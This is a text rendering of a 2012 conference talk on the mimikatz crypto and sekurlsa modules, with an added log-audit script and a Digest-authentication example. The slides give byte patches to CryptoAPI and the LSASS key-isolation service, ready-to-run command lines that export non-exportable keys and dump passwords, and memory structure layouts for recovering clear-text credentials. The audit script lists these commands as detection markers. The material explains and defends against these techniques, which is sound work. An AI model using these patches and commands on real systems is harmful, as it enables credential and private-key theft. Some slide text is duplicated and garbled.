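Added example, not from the slides and not mimikatz code: a small Python audit over parsed Windows Security-log records for the traces behind the two memo and mitigation slides above, that is, privileged accounts logging on interactively instead of over the network, NTLM still in use where the slide says to disable it, SeDebugPrivilege being handed to a logon, and the memo's own command strings (`privilege::debug`, `sekurlsa::logonPasswords`, `crypto::patch…`) appearing in process-creation events. Event ids 4624, 4672 and 4688 and the field names are the real Security-log ones; the records, account names and allowlists are constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Optional

# Assumptions made for this example: which accounts count as privileged, and
# which subjects may receive SeDebugPrivilege without being reported.
PRIVILEGED_ACCOUNTS = {"DA-ADMIN", "SRV-ADMIN"}
DEBUG_PRIVILEGE_ALLOWLIST = {"SYSTEM"}

# Logon types 2 (console), 10 (RemoteInteractive) and 11 (CachedInteractive)
# leave reusable credential material in LSASS; type 3 (network) does not,
# which is why the slide asks for network logons for privileged accounts.
INTERACTIVE_LOGON_TYPES = {2, 10, 11}

# Fragments of the memo commands quoted on the slides.
CREDENTIAL_TOOL_MARKERS = ("privilege::debug", "sekurlsa::", "crypto::patch")


@dataclass
class Finding:
    rule: str
    account: str
    detail: str


def inspect_event(ev: dict) -> Optional[Finding]:
    """Apply the rules to one parsed Security-log record; first match wins."""
    eid = ev.get("EventID")
    if eid == 4624:  # an account was successfully logged on
        user = ev.get("TargetUserName", "")
        logon_type = ev.get("LogonType")
        if user in PRIVILEGED_ACCOUNTS and logon_type in INTERACTIVE_LOGON_TYPES:
            return Finding("privileged-interactive-logon", user,
                           f"logon type {logon_type} on {ev.get('WorkstationName', '?')}")
        if logon_type == 3 and ev.get("AuthenticationPackageName") == "NTLM":
            return Finding("ntlm-network-logon", user,
                           f"NTLM from {ev.get('IpAddress', '?')}")
    elif eid == 4672:  # special privileges assigned to new logon
        subject = ev.get("SubjectUserName", "")
        privileges = ev.get("PrivilegeList", "").split()
        if "SeDebugPrivilege" in privileges and subject not in DEBUG_PRIVILEGE_ALLOWLIST:
            return Finding("debug-privilege-granted", subject,
                           "SeDebugPrivilege listed in 4672")
    elif eid == 4688:  # a new process has been created
        cmd = ev.get("CommandLine", "")
        if any(marker in cmd for marker in CREDENTIAL_TOOL_MARKERS):
            return Finding("credential-tool-command-line",
                           ev.get("SubjectUserName", ""), cmd)
    return None


def analyze(events) -> List[Finding]:
    """Return one Finding per record that trips a rule, in log order."""
    findings = []
    for ev in events:
        f = inspect_event(ev)
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample records (not a real capture); keys mirror the EventData
# field names of the corresponding Security-log events.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "DA-ADMIN", "LogonType": 10,
     "AuthenticationPackageName": "Negotiate", "WorkstationName": "WS01",
     "IpAddress": "10.0.0.15"},
    {"EventID": 4624, "TargetUserName": "DA-ADMIN", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "WorkstationName": "WS01",
     "IpAddress": "10.0.0.15"},
    {"EventID": 4624, "TargetUserName": "jdoe", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "WorkstationName": "WS07",
     "IpAddress": "10.0.0.42"},
    {"EventID": 4672, "SubjectUserName": "jdoe",
     "PrivilegeList": "SeDebugPrivilege\n\t\t\tSeImpersonatePrivilege"},
    {"EventID": 4672, "SubjectUserName": "SYSTEM",
     "PrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": "C:\\Users\\jdoe\\Desktop\\kiwi.exe",
     "CommandLine": "kiwi.exe privilege::debug sekurlsa::logonPasswords full exit"},
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:30} {f.account:10} {f.detail}")
```

Two caveats for real use: the NTLM rule only makes sense on hosts where NTLM has actually been disabled as the slide recommends, otherwise it is pure noise; and the 4688 CommandLine field is only populated when the "include command line in process creation events" audit setting is on, so on hosts without it the last rule has to fall back on NewProcessName, which the renamed binary in the sample shows is a much weaker signal.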
mimikatz :: crypto :: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
Slide 38
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup (a constraint for most users; unavailable for computer keys)
– Export/Archive flag not present
Slide 39
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
Slide 40
mimikatz :: crypto :: capi :: how it's exported? (… level)
Slide 41
[Figure: export flow under CryptoAPI. The process asks the RSA CSP to export a key; the CSP loads the private key (DPAPI decode) and checks the "Exportable" flag: yes, the exported key is returned; no, NTE_BAD_KEY_STATE. The whole check runs inside the calling process ("PLAYSKOOL").]
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable
Slide 42
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach cert (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
Exportable?
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
Slide 43
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable…, export
Slide 44
mimikatz :: crypto :: patchcapi :: limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
Slide 45
mimikatz :: crypto :: cng :: how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not performed in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI… – It is, but it's not perfect…
Slide 46
mimikatz :: crypto :: cng :: how it's exported? (… level)
Slide 47
[Figure: export flow under CNG. The process asks the KeyIso service (in the LSASS process) over RPC to export a key; the service loads the private key (DPAPI decode) and checks the "Exportable" flag: yes, the exported key is returned; no, NTE_NOT_SUPPORTED. On NT6 LSASS is a system protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), so the check no longer runs in the caller's own memory ("PLAYSKOOL").]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass(keyiso)!ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks whether the key is exportable
Slide 48
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
Exportable?
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
Slide 49
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable…, export again
Slide 50
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu ?) – certutil can…
Slide 51
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Slide 52
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
Slide 53
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
Slide 54
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
Slide 55
mimikatz :: that's all folks!
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Slide 56
Blog, Source Code & Contact
blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
Slide 57
Who Why Who Why
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2 2
mimikatz working
mimikatz working
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3 3
sekurlsadll
mimikatzexe
mimikatzexe
KeyIso laquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLog laquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
mimikatzexe
SamSS laquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipe Write a welcome message Wait commandshellip and return results
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
[Diagram: mimikatz.exe is built from the command modules mod_mimikatz_sekurlsa (with sub-parts msv_1_0, tspkg, wdigest, livessp, kerberos), mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver and mod_mimikatz_privilege, on top of the helper modules mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi and mod_cryptong. Injected components: kappfree.dll, kelloworld.dll, klock.dll, the driver mimikatz.sys, and sekurlsa.dll (sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg).]
mimikatz::sekurlsa: what is it?
A module replacement for my previous favorite library
A local module that can read data from the SamSS service (the well known LSASS process)
What the sekurlsa module can dump:
- MSV1_0 hashes
- TsPkg passwords
- Wdigest passwords
- LiveSSP passwords
- Kerberos passwords
- ...
mimikatz::sekurlsa: how LSA works ( level)
[Diagram: WinLogon hands user/domain/password to LsaSS; the authentication packages msv1_0, tspkg, wdigest, livessp and kerberos handle the authentication (msv1_0 and kerberos are shown against the SAM and a challenge/response); the example domain on the slide is PLAYSKOOL.]
mimikatz::sekurlsa: how LSA works ( level)
Authentication packages:
- take the user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get this data and inject it in another session of LSASS, we avoid the authentication part.
This is the principle of « Pass-the-hash »
- In fact, of « Pass-the-x »
mimikatz::sekurlsa: history of « pass-the-... » 1/2
Pass-the-hash
- 1997 - Unix modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd: Microsoft & Marc Murray (TrueSec) present msvctl and provide some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz::sekurlsa: history of « pass-the-... » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases to Microsoft about it...
...Lots of time...
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction...
  • http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz::sekurlsa::tspkg
because sometimes the hash is not enough...
mimikatz::sekurlsa::tspkg: what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve the RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- The user does not have to type their password
- The password is not in the RDP file
- The password is not in the user secrets
mimikatz::sekurlsa::tspkg: questions
The KB says that for it to work we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
• What? Our User/Domain/Password? | Hash? | Ticket? It seems...
- In all cases the system seems to be vulnerable to pass-the-...
In what form? Our specs, [MS-CSSP]:
- 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN)."
  TSPasswordCreds ::= SEQUENCE {
      domainName [0] OCTET STRING,
      userName   [1] OCTET STRING,
      password   [2] OCTET STRING
  }
- Challenge/response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server...
So the password resides somewhere in memory
mimikatz::sekurlsa::tspkg: symbols & theory
Let's explore some symbols
- sounds cool... (thanks Microsoft)
Let's imagine a scenario:
- Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials...
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz::sekurlsa::tspkg: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
mimikatz::sekurlsa::tspkg: demo time
sekurlsa::tspkg
mimikatz::sekurlsa::wdigest
because a clear text password over http/https is not cool
mimikatz::sekurlsa::wdigest: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz::sekurlsa::wdigest: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[...]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[...])
Even after login, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon
The WDigest provider must have the elements to compute responses for different servers:
- Username
- Realm (from the server)
- Password
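An added Python example, not from the talk, that carries the slide's formulas through RFC 2617 Digest with qop=auth (the slide's [...] filled with nc:cnonce:qop as the RFC defines). It checks the RFC's own worked example, then shows that an HA1 fixed at logon for one realm cannot answer a challenge from another realm, which is exactly why the WDigest provider has to keep the password itself. The account, realms, nonce and cnonce in the second part are constructed values.

```python
"""Added example, not from the talk: RFC 2617 Digest arithmetic with qop=auth.

The slide's H = MD5(HA1:nonce:[...]:HA2) becomes, with the RFC's fields:
    response = MD5(HA1 ":" nonce ":" nc ":" cnonce ":" qop ":" HA2)
Account, realm, nonce and cnonce values in cached_ha1_answers_challenge()
are constructed.
"""
import hashlib


def md5_hex(*parts: str) -> str:
    """MD5 over the colon-joined parts, as every Digest quantity is built."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is the server's choice."""
    return md5_hex(username, realm, password)


def ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (auth-int would add a body hash)."""
    return md5_hex(method, uri)


def response_from_ha1(h1: str, nonce: str, nc: str, cnonce: str,
                      method: str, uri: str) -> str:
    """The value a client puts in the Authorization header (qop=auth)."""
    return md5_hex(h1, nonce, nc, cnonce, "auth", ha2(method, uri))


def response_from_password(username: str, realm: str, password: str,
                           nonce: str, nc: str, cnonce: str,
                           method: str, uri: str) -> str:
    """What a client holding the clear password can compute for any realm."""
    return response_from_ha1(ha1(username, realm, password),
                             nonce, nc, cnonce, method, uri)


def rfc2617_example() -> str:
    """Worked example of RFC 2617 section 3.5 (password "Circle Of Life")."""
    return response_from_password(
        "Mufasa", "testrealm@host.com", "Circle Of Life",
        "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b",
        "GET", "/dir/index.html")


def cached_ha1_answers_challenge(username: str, password: str,
                                 cached_realm: str, challenge_realm: str) -> bool:
    """Could an HA1 fixed at logon for cached_realm satisfy a later challenge
    from challenge_realm? Only when the realms coincide: HA1 binds the realm,
    so a provider that must answer arbitrary servers needs the password.
    nonce, nc and cnonce are constructed sample values."""
    nonce, nc, cnonce = "1b2c3d4e", "00000001", "f00dcafe"
    cached = ha1(username, cached_realm, password)
    from_cache = response_from_ha1(cached, nonce, nc, cnonce, "GET", "/")
    expected = response_from_password(username, challenge_realm, password,
                                      nonce, nc, cnonce, "GET", "/")
    return from_cache == expected


if __name__ == "__main__":
    print("RFC 2617 response:", rfc2617_example())
    # Constructed account and realms.
    print("same realm:", cached_ha1_answers_challenge("alice", "Pa55", "CORP", "CORP"))
    print("other realm:", cached_ha1_answers_challenge("alice", "Pa55", "CORP", "intranet.example"))
```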
mimikatz::sekurlsa::wdigest: theory
This time we know:
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts the data in the doubly linked list wdigest!l_LogSessList
.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz::sekurlsa::wdigest: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* [...] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz::sekurlsa::wdigest: demo time
sekurlsa::wdigest
mimikatz::sekurlsa::livessp
because Microsoft was too good in closed networks
mimikatz::sekurlsa::livessp: how?
Actually I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~... be more brutal this time: make a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz::sekurlsa::livessp: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert the data in LiveGlobalLogonSessionList (similar to WDigest)
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  <- Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
  <- Yeah, Pass the Hash capability with a Live account too...

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
